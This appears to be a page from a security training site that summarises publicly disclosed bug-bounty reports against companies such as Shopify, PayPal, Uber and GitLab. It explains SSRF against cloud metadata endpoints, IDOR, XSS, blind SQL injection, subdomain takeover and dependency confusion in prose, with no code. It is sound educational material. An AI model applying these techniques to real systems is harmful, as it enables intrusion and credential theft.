// seen in the wild
Real breaches, broken down
Theory sticks when you see it pay off. Each breakdown dissects a publicly disclosed HackerOne report - what was found, how, the impact, the fix - and links to the VR4CS lesson that teaches the skill behind it.
Shopify
2018-04-13
SSRF in Exchange leads to root access in all instances
Shopify's Exchange Marketplace let users import a store screenshot from a URL. By pointing it at the cloud metadata endpoint (169.254.169.254) and internal services, a researcher reached internal infrastructure and ultimately obtained root access across instances - the textbook impact of an unfiltered server-side fetch.
PayPal
2018-11-30
IDOR to add secondary users to any PayPal business account
A business-account API endpoint trusted a user-supplied account identifier without checking ownership. By swapping that ID, a researcher could add secondary users to other businesses' accounts - a classic Insecure Direct Object Reference. The fix is server-side authorization on every object access.
PayPal
2019-02-20
Stored XSS on paypal.com/signin via cache poisoning
By poisoning a cache key, a researcher got a malicious response served from PayPal's own signin page - turning a caching quirk into stored cross-site scripting on one of the most sensitive pages on the internet. Shows how XSS plus caching equals persistent, widespread impact.
Uber
2016-07-08
Blind SQL injection on sctrack.email.uber.com.cn
Orange Tsai found that a base64-encoded parameter in an Uber marketing-email unsubscribe link was concatenated into a SQL query. With no visible output, he used time-based blind injection (sleep payloads) and a script to extract database users and schema character by character.
Starbucks
2018-03-30
Subdomain takeover via a dangling Azure CNAME
A Starbucks subdomain still had a CNAME pointing at a Microsoft Azure resource that was no longer registered. By claiming that dangling Azure name, the researcher could serve attacker content from a trusted Starbucks URL - ideal for phishing and stealing tokens passed through redirects.
PayPal
2021-02-09
RCE via dependency confusion (internal npm packages from the public registry)
Alex Birsan's landmark research: by publishing packages on the public npm registry with the same names as a company's private internal packages, build systems pulled the attacker's public version instead - executing his code inside corporate networks. The reason package management is a real attack surface.
GitLab
2019-09-19
Git flag injection: local file overwrite to remote code execution
User-controlled input was passed to a git command without separating options from arguments, letting a researcher inject git flags. That primitive enabled writing an arbitrary local file, which was escalated to remote code execution on GitLab infrastructure - a great lesson in argument injection.
Pornhub
2018-06-01
IDOR lets any user delete others' photos and albums
An album/photo deletion endpoint acted on an object ID without verifying the requester owned it. Supplying someone else's ID let an attacker delete their media - a destructive IDOR, and a reminder that authorization must be checked on writes and deletes, not just reads.
Lyft
2020-06-01
My expense report resulted in an SSRF on Lyft
A receipt/expense feature fetched a user-supplied URL server-side. By pointing it at internal addresses, a researcher turned an innocuous 'upload your receipt' flow into a window onto Lyft's internal network - proving how everyday URL-fetching features become SSRF.
Dropbox
2020-08-01
SSRF at HelloSign leads to AWS private key disclosure
An SSRF in app.hellosign.com let a researcher reach the EC2 instance metadata service (169.254.169.254) and read temporary AWS credentials - the exact attack pattern behind some of the largest cloud breaches.
Valve
2019-02-15
RCE on the Steam client via a Server Info buffer overflow
A malformed game-server 'Server Info' response overflowed a fixed buffer in the Steam client, giving an attacker control of execution - a reminder that memory-safety bugs in native clients are still very real RCE.
Valve
2018-11-01
XSS in the Steam React chat client
User-controlled content rendered in Steam's chat client executed as script, showing that XSS isn't just a browser problem - it bites Electron/React desktop apps too, where the impact can reach the local system.
2022-04-01
One-click account hijack via Sign in with Apple on Reddit
A flaw in how the Apple sign-in flow was handled allowed an attacker to take over accounts of users who used 'Sign in with Apple' - a sharp lesson in how third-party authentication flows can break access control.
GitLab
2020-04-01
SSRF via project import (remote_attachment_url)
GitLab's project-import feature fetched a remote attachment URL server-side without sufficient validation, enabling SSRF against internal services - a great example of how import/integration features expand the attack surface.